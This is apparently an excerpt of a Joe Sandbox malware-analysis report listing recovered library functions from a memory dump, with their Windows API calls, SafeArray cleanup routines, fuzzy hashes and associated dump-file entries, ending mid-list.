Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 82d92080d6d162ccbf1bb22c0b5b7ebafd132a7bbd44702ab2edceb0c8eb52f6
Instruction ID: cde4785b2ec66f5830b9c28846b6214e71eafc281cfe2c3eacec93e0c282a07b
Opcode Fuzzy Hash: 82d92080d6d162ccbf1bb22c0b5b7ebafd132a7bbd44702ab2edceb0c8eb52f6
Instruction Fuzzy Hash: 90F0507360533427CB10356BDC80B9FBABCDB4275CB18093AF6E897F00E625DC044194

Function 6CF6E9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6CF99880,00000008,6CF6EAC1,00000000,00000000,?,?,6CF6D7DD,6CF69DEF,00000000,?,6CF69BD4,6CF01290,A64A5C11), ref: 6CF6E9CA
__lock.LIBCMT ref: 6CF6E9FE

Part of subcall function 6CF72438: __mtinitlocknum.LIBCMT ref: 6CF7244E
Part of subcall function 6CF72438: __amsg_exit.LIBCMT ref: 6CF7245A
Part of subcall function 6CF72438: EnterCriticalSection.KERNEL32(6CF69BD4,6CF69BD4,?,6CF6EA03,0000000D), ref: 6CF72462

InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6CF6EA0B
__lock.LIBCMT ref: 6CF6EA1F
___addlocaleref.LIBCMT ref: 6CF6EA3D

Strings

KERNEL32.DLL, xrefs: 6CF6E9C5

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 4ab649c37df8f5dfe635a590a53d28d2b9618c8154ec004d663c37a55552fb66
Instruction ID: cb098aa54a2a064e98bbf6878a35aad2e971f1240ac11b3ee0d998f806f13094
Opcode Fuzzy Hash: 4ab649c37df8f5dfe635a590a53d28d2b9618c8154ec004d663c37a55552fb66
Instruction Fuzzy Hash: BC016D72945B00DFD7249F66D805789FBF0BF42328F20890ED49A97FA0CB74AA44CB61

Function 6CF1E120 Relevance: 9.4, APIs: 6, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CF1E29B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CF1E2B6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CF1E2D7

Part of subcall function 6CF25760: std::tr1::_Xweak.LIBCPMT ref: 6CF25769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF1E309

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF1E523
InterlockedCompareExchange.KERNEL32(6CFAC6A4,45524548,4B4F4F4C), ref: 6CF1E544

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID:
API String ID: 2722669376-0
Opcode ID: 8e90a59d282fd3bbe5515ad2a7e2c73162f7e65d4ef1eba677470daab6106e2d
Instruction ID: a75d1ab0660f2fb1076bbab8fb9dda0838217da100866c59fbc440eff4ccd302
Opcode Fuzzy Hash: 8e90a59d282fd3bbe5515ad2a7e2c73162f7e65d4ef1eba677470daab6106e2d
Instruction Fuzzy Hash: A4D1B2B1A142059FDB00CFA4C888BEEB7B8EF45308F148569E905EBF81D775E944CBA1

Function 6CF28A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 5496e35baf50e09f82e892662114172fd9e0322711d3f6373d63ee3c5d4c1dfd
Instruction ID: 98329331222d5c6ecd369f9e33ae9307206710b784b61b6b865baa5a79dfe23a
Opcode Fuzzy Hash: 5496e35baf50e09f82e892662114172fd9e0322711d3f6373d63ee3c5d4c1dfd
Instruction Fuzzy Hash: 86414C75A01A189FCB00DFA9CD80A9EB7FAAF89304F20858AE519DB755DB35EC41CF50

Function 6CF28DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 7e35fbbd668c8ab477596982a405184dcf2abbf3462eda98f7a2dc69d6f417bf
Instruction ID: 9d2ca00b03d47796009f339239bd8ee850b13755adb0c735a9c675ed8ab0d5d2
Opcode Fuzzy Hash: 7e35fbbd668c8ab477596982a405184dcf2abbf3462eda98f7a2dc69d6f417bf
Instruction Fuzzy Hash: 2F415D71A01A189FDB00CFA9CC80BAEB7F9AF89204F208596E518EB755DB35E941CF50

Function 6CF20338 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 7e35fbbd668c8ab477596982a405184dcf2abbf3462eda98f7a2dc69d6f417bf
Instruction ID: aa0404fcde8d450070e274cf4f142fc08b356fbd1e3e715078b6e0ffb23fe15c
Opcode Fuzzy Hash: 7e35fbbd668c8ab477596982a405184dcf2abbf3462eda98f7a2dc69d6f417bf
Instruction Fuzzy Hash: 124139B0A016089FCB00CFA9CC84B9EB7F9AF89214F24859AE518EB651CB75ED41CF50

Function 6CF28CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 5d6b00b80e421b9c2f1aa27d86a7be50b3041cf2b22446c90fdc70b0227ee192
Instruction ID: 79dd68434f02daff86332468bcb41a45db9a03c1e4d237650ae1ad8dacda2566
Opcode Fuzzy Hash: 5d6b00b80e421b9c2f1aa27d86a7be50b3041cf2b22446c90fdc70b0227ee192
Instruction Fuzzy Hash: EB315A71E01A089FCB00CFA9CC80B9EB7F9AF89204F208686E418E7651CB75ED41CF50

Function 6CF28F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 3ca3fc82dda870d67f85c50e092e22fc8c45c0973894f2b6e6ab707b133c7ff9
Instruction ID: fec22dc1a5c3a31218fe7f13c3d37284040e8cf446c0a8f03b1d29ee4facda2e
Opcode Fuzzy Hash: 3ca3fc82dda870d67f85c50e092e22fc8c45c0973894f2b6e6ab707b133c7ff9
Instruction Fuzzy Hash: 9D313A71E01A089FCB10CFA9CC80B9EB7FAAF89204F208586E518E7651DB79ED41CF50

Function 6CF28BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: e3e27d00eebbd6272224ffaddd9a0f19e4faae28e0168ead71db86396c56103e
Instruction ID: 0f1e57892cbc413657a5125aa5606d192c2b05fc70d1fa28af8777a23bcf157b
Opcode Fuzzy Hash: e3e27d00eebbd6272224ffaddd9a0f19e4faae28e0168ead71db86396c56103e
Instruction Fuzzy Hash: E8314C71E01A089FDB10DFA9CC80B9EB7F9AF89204F20858AE419E7655DB79ED41CF50

Function 6CF204D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 3ca3fc82dda870d67f85c50e092e22fc8c45c0973894f2b6e6ab707b133c7ff9
Instruction ID: 9705575d41b52cdffd4b0c7733bb3f2f778c715a32b17a292b3993ff88478eeb
Opcode Fuzzy Hash: 3ca3fc82dda870d67f85c50e092e22fc8c45c0973894f2b6e6ab707b133c7ff9
Instruction Fuzzy Hash: 75313A70E116089FCB00CFA9CC84B9EB7F9AF89314F20858AE518E7651CB79EE418F50

Function 6CF205DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1010e3f529134c81931eb302981881dd58d018f1f2649eed3f0cef52a535217b
Instruction ID: e2aa135db6a023b9fa72943279fe9dc20c1585e1a757c71328cedf28154d01bb
Opcode Fuzzy Hash: 1010e3f529134c81931eb302981881dd58d018f1f2649eed3f0cef52a535217b
Instruction Fuzzy Hash: D2313BB0A116189FCB00CFA9CD84B9EB7F9AF89314F208596E418E7651DB75DD40CF50

Function 6CF20668 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 6b7c8b7201cb74bc6c4219af55bddaa6e6a1821b3b38212de47cae9a00477af7
Instruction ID: 70714f92b040bfbb0a5ac8c96db089ca4fb1b5a1c4397bb3acedb8e614a5ee7e
Opcode Fuzzy Hash: 6b7c8b7201cb74bc6c4219af55bddaa6e6a1821b3b38212de47cae9a00477af7
Instruction Fuzzy Hash: 1D313B70A116189FCB00CFA9CD84B9EB7F9AF89214F20859AE518E7651CB75DE408F50

Function 6CF2908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1010e3f529134c81931eb302981881dd58d018f1f2649eed3f0cef52a535217b
Instruction ID: 16d7bb11adc54b493305c5dc58e835f9ad16b6c7a8a6353920f5df4c8031d10a
Opcode Fuzzy Hash: 1010e3f529134c81931eb302981881dd58d018f1f2649eed3f0cef52a535217b
Instruction Fuzzy Hash: 26313A70E01A189FCB00CFA9CD80B9EB7F9AF89204F20858AE519E7651DB75EE41CF50

Function 6CF291A9 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
